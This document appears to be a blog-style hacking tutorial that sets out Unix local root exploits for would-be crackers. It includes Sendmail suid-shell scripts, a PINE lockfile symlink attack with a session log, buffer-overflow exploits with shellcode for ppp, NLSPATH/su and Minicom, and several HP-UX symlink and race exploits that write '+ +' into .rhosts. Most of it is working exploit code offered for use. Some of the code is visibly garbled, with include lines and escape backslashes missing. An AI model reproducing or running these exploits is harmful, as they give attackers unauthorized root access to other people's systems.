Exploting through telnet
Exploits and Telnet
About: Well, exploits are the most common way of hacking webpages but they are also more complicated then hacking through ftp or using the phf. Most crackers get an account with the target (if possible) and view the glitches from the inside out. Exploits expose errors or bugs in systems and usually allow you to gain root access. There are many different exploits around and you can view each seperately. I'm going to list a few below but the list of exploits is endless.
This exploit is known as Sendmail v.8.8.4 It creates a suid program /tmp/x that calls shell as root. This is how you set it up:
cat <<>/tmp/x.c
#define RUN "/bin/ksh"
#include
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat <<>/tmp/spawnfish.c
main()
{
execl("/usr/lib/sendmail","/tmp/smtpd",0);
}
_EOF_
#
cat <<>/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut -d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
And now on to another exploit. I'm going to display the pine exploit through linux. By watching the process table with ps to see which users are running PINE, one can then do an ls in /tmp/ to gather the lockfile names for each user. Watching the process table once again will now reveal when each user quits PINE or runs out of unread messages in their INBOX, effectively deleting the respective lockfile.
Creating a symbolic link from /tmp/.hamors_lockfile to ~hamors/.rhosts
(for a generic example) will cause PINE to create ~hamors/.rhosts as a
666 file with PINE's process id as its contents. One may now simply do
an echo "+ +" > /tmp/.hamors_lockfile, then rm /tmp/.hamors_lockfile.
This was writen by Sean B. Hamor...For this example, hamors is the victim while catluvr is the attacker:
hamors (21 19:04) litterbox:~> pine
catluvr (6 19:06) litterbox:~> ps -aux | grep pine
catluvr 1739 0.0 1.8 100 356 pp3 S 19:07 0:00 grep pine
hamors 1732 0.8 5.7 249 1104 pp2 S 19:05 0:00 pine
catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors
- -rw-rw-rw- 1 hamors elite 4 Aug 26 19:05 .302.f5a4
catluvr (8 19:07) litterbox:~> ps -aux | grep pine
catluvr 1744 0.0 1.8 100 356 pp3 S 19:08 0:00 grep pine
catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts /tmp/.302.f5a4
hamors (23 19:09) litterbox:~> pine
catluvr (11 19:10) litterbox:~> ps -aux | grep pine
catluvr 1759 0.0 1.8 100 356 pp3 S 19:11 0:00 grep pine
hamors 1756 2.7 5.1 226 992 pp2 S 19:10 0:00 pine
catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4
catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4
+ +
catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4
catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors
Now on to another one, this will be the last one that I'm going to show. Exploitation script for the ppp vulnerbility as described by no one to date, this is NOT FreeBSD-SA-96:15. Works on FreeBSD as tested. Mess with the numbers if it doesnt work. This is how you set it up:
#include
#include
#include
#define BUFFER_SIZE 156 /* size of the bufer to overflow */
#define OFFSET -290 /* number of bytes to jump after the start
of the buffer */
long get_esp(void) { __asm__("movl %esp,%eaxn"); }
main(int argc, char *argv[])
{
char *buf = NULL;
unsigned long *addr_ptr = NULL;
char *ptr = NULL;
char execshell[] =
"xebx23x5ex8dx1ex89x5ex0bx31xd2x89x56x07x89x56x0f" /* 16 bytes */
"x89x56x14x88x56x19x31xc0xb0x3bx8dx4ex0bx89xcax52" /* 16 bytes */
"x51x53x50xebx18xe8xd8xffxffxff/bin/shx01x01x01x01" /* 20 bytes */
"x02x02x02x02x03x03x03x03x9ax04x04x04x04x07x04"; /* 15 bytes, 57 total */
int i,j;
buf = malloc(4096);
/* fill start of bufer with nops */
i = BUFFER_SIZE-strlen(execshell);
memset(buf, 0x90, i);
ptr = buf + i;
/* place exploit code into the buffer */
for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell[i];
addr_ptr = (long *)ptr;
for(i=0;i < (104/4); i++)
*addr_ptr++ = get_esp() + OFFSET;
ptr = (char *)addr_ptr;
*ptr = 0;
setenv("HOME", buf, 1);
execl("/usr/sbin/ppp", "ppp", NULL);
}
More exploits:
-Hpux
ppl exploit: #!/bin/ksh
# ppl exploit, second part - SOD 15Oct96
# not all buffer overruns need to force an address into the PC
# works on 10.X, too, oddly enough. - Script Junkie
#HOST='localhost'
#USER=`whoami`
HOST="+"
USER="+"
cd /tmp
rm core 2> /dev/null
ln -s ~root/.rhosts core
AAA='aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaa'
STUFF=`echo "${AAA}n${HOST} ${USER}"`
ppl -o "${STUFF}"
rm core
remsh localhost -l root sh -i
schlowdishk exploit: #!/bin/ksh
# OK.. this bug gets inserted into remwatch after the patch.. It was there
# before in some versions, but now it's pretty much universal if the patch
# gets installed...
# Silly Scriptor & friend, SOD, (11Jun96)
if [ ! -x /usr/remwatch/bin/disks/showdisk ]
then
echo This is an exploit for the showdisk utility internal to
echo HP's Remote Watch series of programs.
echo The showdisk utility doesn't appear to be on your system.
echo Moo
exit
fi
FILE=$1
if [ -z "$FILE" ]
then
FILE=/.rhosts
fi
if [ -f "$FILE" ]
then
echo "Hey, there already a ${FILE}!"
echo "I'd rather enjoy making new files, thank you very much..."
exit
fi
umask 0000
/usr/remwatch/bin/disks/showdisk arg arg ${FILE} arg > /dev/null 2>&1
>${FILE}
ls -l ${FILE}
if [ "${FILE}" = "/.rhosts" ]
then
echo "Adding + + ..."
echo "+ +" >> /.rhosts
remsh localhost -l root ksh -i
fi
glance exploit: You need only do the following:
1. Log in as yourself.
2. Decide what file you want to create for world write.
3. do a umask 000
4. Then do /usr/perf/bin/glance -f
5. After a few seconds, quit glance.
6. That file will now be there and world is writeable, now edit it.
7. If it previousle existed, it will be trunc'ed with orig perms.
sysdiag exploit: Basically, the sysdiag stuff is set-uid root. You can exploit that feature to create and write stuff to arbitrary files on the system as root, while not being root. If the target file you want to create exists,this doesn't work. Perhaps there is a way around that, but that ain't the point. The point is that I used this to get root in 30 seconds on my HP's and that's not good. Heck, this is probably faster then asking for the root password !!!
More on the problem:
What happens is that a feature exists to create a log file of your sysdiag session that can be invoked while in the program. You give it the name of the file to create, and if it is a sym link to a non-existant file, sysdiag follows the sym link and creates the file as root for you and logs your session in it. To show a typical vunerability, I created /.rhosts from a sym link in /tmp that sysdiag followed and then caused sysdiag to echo the line "+ +" in to the file. Then I could rlogin as root.
If /.rhosts or /etc/hosts.equiv don't exist, you can use this trick to create and put a "+ +" in either of those files. That's an easy way to become root or someone else. You can do other files as well. This ain't cool, at all...
How I tested this on my system:
1. I logged in with my regular account
2. I made a sym link with the command: ln -s /.rhosts /tmp/tempfile
3. I ran the command: /bin/sysdiag
4. From the DUI> prompt I typed: outfile /tmp/f1
5. From the DUI> prompt I typed: + +
6. From the DUI> prompt I typed: redo
7. When my previous command echoed to the screen I pressed
8. From the DUI> prompt I typed: exit
9. Now at the shell prompt, and out of sysdiag, I typed:
rlogin localhost -l root
10. Once logged in I typed: id
and it said I was root...
This is the script of my sysdiag session:
Script started on Sat Sep 21 23:29:10 1996
$ id
uid=1648(jjacobi) gid=999(systems)
$ ls -l /tmp
total 0
$ ls -l /.rhosts
/.rhosts not found
$ ln -s /.rhosts /tmp/tempfile
$ ls -l /tmp
total 2
lrwx--x--x 1 jjacobi systems 8 Sep 21 23:29 tempfile ->
/.rhosts
$ ls -l /.rhosts
/.rhosts not found
$ /bin/sysdiag
sam exploit: Go to your HP 9.04/5 system first.
1. Log into your system as a normal user.
2. Compile the program below, making any changes if you need to. (you shouldn't need to)
3. Log in on another terminal, become root and insure that sam is not currently executing.
4. As the normal user log in, run the program that you compiled in step 2.
5. On the root log in session, run sam.
6. Look at the target file.
/* Code to exploit race of sam calling iopasrer.sh
It will usually cause the ioparser.sh script run
by root to follow the sym links created here to
create or truncate TARGET_FILENAME as root.
It ain't pretty and may not always work, but usually
does.
Compile on HP9000/[700/800] 9.04[5] with the command:
cc racer.c -o racer -Ae
*/
#include
#include
#include
#include
#include
#include
#include
#define PROC_TO_LOOK_FOR "sam" /* The process to look
for in ps */
#define TARGET_FILENAME "/check_this" /* File that is created or
trunc'ed */
#define NUM_SYM_LINKS 50 /* Increase this
for systems that fork() alot */
void main(void)
{
char ps_buf[65536]; /* ps data buffer */
char *line; /* a pointer in to the ps_buf */
char f1[80]; /* buffer space for the sym link name */
char hostname[32]; /* buffer space to hold hostname, duh */
int fd; /* fd is for the pipe */
int ext; /* the extantion to place on the
symlink (pid) */
int loop; /* Dumb loop variable,
suggestions ??? */
unlink("ps_fifo"); /* Why
not */
mkfifo("ps_fifo",S_IRUSR|S_IWUSR); /* Need this */
fd = open("ps_fifo",O_RDONLY|O_NONBLOCK); /* You read the pipe
*/
gethostname(hostname,32); /* gets the hostname just like
ioparser.sh !!! */
printf("Looking for process %s, will exploit filename
%sn",PROC_TO_LOOK_FOR,TARGET_FILENAME);
/* FIGURE THE REST OUT YOURSELF, IT AIN'T ARTWORK... */
while(1) {
system("/bin/ps -u 0 > ps_fifo");
read(fd,ps_buf,65536);
if( (line = strstr(ps_buf,PROC_TO_LOOK_FOR)) != NULL ) {
while( *line != 'n' ) {
line--;
}
line+=2;
line[5] = '';
ext = atoi(line);
for(loop = 1 ; loop <= NUM_SYM_LINKS ; loop ++)
{
sprintf(f1,"/tmp/%s.%d",hostname,ext +
loop);
symlink(TARGET_FILENAME,f1);
}
while( (access(TARGET_FILENAME,F_OK)) < 0 );
printf("%s has run, wait a few seconds and check
%sn",PROC_TO_LOOK_FOR,TARGET_FILENAME);
unlink("ps_fifo");
exit();
}
}
}
-Linux
nlspath exploit: /*
* NLSPATH buffer overflow exploit for Linux, tested on Slackware 3.1
* Copyright (c) 1997 by Solar Designer
*/
#include
#include
#include
char *shellcode =
"x31xc0xb0x31xcdx80x93x31xc0xb0x17xcdx80x68x59x58xffxe1"
"xffxd4x31xc0x99x89xcfxb0x2ex40xaex75xfdx89x39x89x51x04"
"x89xfbx40xaex75xfdx88x57xffxb0x0bxcdx80x31xc0x40x31xdb"
"xcdx80/"
"/bin/sh"
"0";
char *get_sp() {
asm("movl %esp,%eax");
}
#define bufsize 2048
char buffer[bufsize];
main() {
int i;
for (i = 0; i < bufsize - 4; i += 4)
*(char **)&buffer[i] = get_sp() - 3072;
memset(buffer, 0x90, 512);
memcpy(&buffer[512], shellcode, strlen(shellcode));
buffer[bufsize - 1] = 0;
setenv("NLSPATH", buffer, 1);
execl("/bin/su", "/bin/su", NULL);
}
--- nlspath.c ---
And the shellcode separately:
--- shellcode.s ---
.text
.globl shellcode
shellcode:
xorl %eax,%eax
movb $0x31,%al
int $0x80
xchgl %eax,%ebx
xorl %eax,%eax
movb $0x17,%al
int $0x80
.byte 0x68
popl %ecx
popl %eax
jmp *%ecx
call *%esp
xorl %eax,%eax
cltd
movl %ecx,%edi
movb $'/'-1,%al
incl %eax
scasb %es:(%edi),%al
jne -3
movl %edi,(%ecx)
movl %edx,4(%ecx)
movl %edi,%ebx
incl %eax
scasb %es:(%edi),%al
jne -3
movb %dl,-1(%edi)
movb $0x0B,%al
int $0x80
xorl %eax,%eax
incl %eax
xorl %ebx,%ebx
int $0x80
.byte '/'
.string "/bin/sh0"
Minicom 1.75 exploit: #include
#include
#include
#include
#include
#define NOP 0x90
const char usage[] = "usage: %s stack-offset buffer-size argv0 argv1 ...n";
extern code();
void dummy( void )
{
extern lbl();
/* do "exec( "/bin/sh" ); exit(0)" */
__asm__( "
code: xorl %edx, %edx
pushl %edx
jmp lbl
start2: movl %esp, %ecx
popl %ebx
movb %edx, 0x7(%ebx)
xorl %eax, %eax
movb $0xB, %eax
int $0x80
xorl %ebx, %ebx
xorl %eax, %eax
inc %eax
int $0x80
lbl: call start2
.string "/bin/sh"
");
}
void Fatal( int rv, const char *fmt, ... )
{
va_list vl;
va_start( vl, fmt );
vfprintf( stderr, fmt, vl );
va_end( vl );
exit( rv );
}
int main( int ac, char **av )
{
int buff_addr; /* where our code is */
int stack_offset = 0,
buffer_size = 0, i, code_size;
char *buffer, *p;
buff_addr = (int)(&buff_addr); /* get the stack pointer */
code_size = strlen( (char *)code ); /* get the size of piece of */
/* code in dummy() */
if( ac < 5 ) Fatal( -1, usage, *av );
buff_addr -= strtol( av[ 1 ], NULL, 0 );
buffer_size = strtoul( av[ 2 ], NULL, 0 );
if( buffer_size < code_size + 4 )
Fatal( -1, "buffer is too short -- %d minimum.n", code_size + 5);
/* "this is supported, but not implemented yet" ;) */
if( (buffer = malloc( buffer_size )) == NULL )
Fatal( -1, "malloc(): %sn", strerror( errno ) );
fprintf( stderr, "using buffer address 0x%8.8xn", buff_addr );
for( i = buffer_size - 4; i > buffer_size / 2; i -= 4 )
*(int *)(buffer + i) = buff_addr;
memset( buffer, NOP, buffer_size/2 );
i = (buffer_size - code_size - 4)/2;
memcpy( buffer + i, (char *)code, code_size );
buffer[ buffer_size - 1 ] = '';
p = malloc( strlen( av[ ac - 1 ] ) + code_size + 1 );
if( !p )
Fatal( -1, "malloc(): %sn", strerror( errno ) );
strcpy( p, av[ ac - 1 ] );
strcat( p, buffer );
av[ ac - 1 ] = p;
execve( av[ 3 ], av + 3, NULL );
perror( "exec():" );
}
________________________________________________________________________
discard 9
netstat 15
chargen 19
ftp 21
telnetd 23
smtp 25
rlp 39
bootp 67
fingerk 79
http 80 / 8080
military http 80 / 8080 / 5580
link 87
pop3 110
identd 113
nntp 119
newsk 144
execk 512
login 513
pkill 515
ktalk 517
ntalk 518
netwall 533
rmontior 560
montior 561
kerberos 750
Common telnet commands:
Command: Function:
access Telnet account
c Connect to a host
cont Continue
d Disconnect
full Network echo
half Terminal echo
hangup Hangs up
mail Mail
set Select PAD parameters
stat Show network port.
telemail Mail
No comments:
Post a Comment